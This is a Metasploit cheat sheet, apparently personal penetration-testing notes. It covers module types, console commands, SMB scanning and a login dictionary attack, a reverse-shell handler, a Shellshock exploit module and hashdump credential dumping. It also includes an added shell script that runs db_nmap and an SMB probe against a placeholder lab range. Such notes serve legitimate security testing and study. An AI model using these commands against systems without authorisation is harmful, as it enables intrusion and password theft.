Metasploit
Modules
- Auxiliary: scanners, crawlers and fuzzers
- Encoders: encode payloads
- Evasion: prepare payloads to circumvent signature-based malware detection
- NOPs: NOP generators for various architectures
- Payloads: code to run on target systems
  - Singles, inline payloads, for example generic/shell_reverse_tcp
  - Stagers, small payloads that download the stage
  - Stages, for example windows/x64/shell/reverse_tcp
- Post: post-exploitation modules
Notes
- Search within a module type
search type:auxiliary <stuff>
- Run the exploit without dropping into the session (session goes to background)
run -z
- Check whether the target is vulnerable without exploiting it
check
- Set a variable globally, for all modules
setg
- Unset a variable, for example the payload
unset payload
- Flush all variables via
unset all
Sessions
- Background via
background
or ctrl+z
- Foreground via
sessions -i <number>
Scanning
- Portscan
search portscan
- UDP Sweep via
scanner/discovery/udp_sweep
- SMB Scan via
scanner/smb/smb_version
and scanner/smb/smb_enumshares
- SMB login dictionary attack
scanner/smb/smb_login
- NetBios via
scanner/netbios/nbname
- HTTP version
scanner/http/http_version
Database
- Start postgres
msfdb init
db_status
- Separate projects via workspaces
workspace -a <projectname>
- Scans whose results are stored in the database via
db_nmap
- Show discovered hosts via
hosts
- Show discovered services via
services
- Set RHOSTS from the stored hosts via
hosts -R
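The database steps above chained into one msfconsole resource script, as an added example that is not part of the original notes. The workspace name `lab` and the range `10.0.0.0/24` are placeholders for your own lab network, and the `smb_version` probe at the end is only one choice of read-only scanner; all three are assumptions, not values from the page.

```shell
#!/bin/sh
# Added example (not from the original notes): wraps the database workflow
# (workspace -> db_nmap -> hosts/services -> hosts -R -> scanner) into a
# resource script that msfconsole runs with -r. Workspace name and target
# range are placeholders for your own lab; both are assumptions.

# gen_rc WORKSPACE RANGE -> prints the resource script on stdout
gen_rc() {
    ws="$1"
    range="$2"
    cat <<EOF
# keep this engagement's hosts and services apart from other projects
workspace -a ${ws}
# db_nmap stores nmap results in the database; -sV grabs service banners,
# -Pn skips host discovery so filtered hosts are still scanned
db_nmap -sV -Pn ${range}
# review what was stored
hosts
services
# select a read-only version probe first, so hosts -R fills RHOSTS for
# this module rather than the global datastore
use auxiliary/scanner/smb/smb_version
hosts -R
run
back
EOF
}

# run_rc WORKSPACE RANGE -> writes the script to a temp file and feeds it
# to msfconsole; if msfconsole is missing, leaves the file for inspection
run_rc() {
    rc="$(mktemp)"
    gen_rc "$1" "$2" > "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script written to $rc" >&2
    fi
}

# usage: run_rc lab 10.0.0.0/24
```

Lines starting with `#` are ignored by the resource-script reader, so the comments can stay in the generated file. Running `hosts -R` after `use` keeps RHOSTS scoped to the selected module; run it before `use` and it lands in the global datastore instead, which is rarely what you want on a shared console.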
Exploits
show targets
show payloads
Reverse Shells
- Generic multi handler, then set the payload and its options
use exploit/multi/handler
set payload <payloadhandler>
- Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec
Post Exploitation
- Windows (inside a Meterpreter session)
load kiwi
hashdump
- Linux
use post/linux/gather/hashdump